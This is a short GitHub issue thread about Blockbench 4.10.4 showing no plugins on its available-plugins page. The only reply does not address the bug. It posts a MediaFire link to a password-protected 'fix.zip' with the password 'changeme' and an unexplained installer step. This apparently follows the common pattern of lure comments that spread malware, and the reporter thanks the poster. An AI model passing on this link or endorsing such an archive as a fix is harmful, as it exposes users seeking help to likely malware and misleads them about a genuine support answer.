### ISSUE TITLE
Plugins are not displayed on the available plugins page

### ISSUE THREAD

**Issue by LoLuxe** [JannisX11/blockbench#2459]
### What are you trying to do, and what do you expect to happen?

I want to download some plugins but there are no plugins available
![image](https://github.com/user-attachments/assets/0532a83e-d38e-4c43-8fc6-b8fdb3310f9e)

### What happens instead?

-

### Model format in which the issue occurs

-

### Blockbench variant

Program

### Blockbench version

4.10.4

### Operating System

Windows 10

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LoLuxe** [comment]
thx
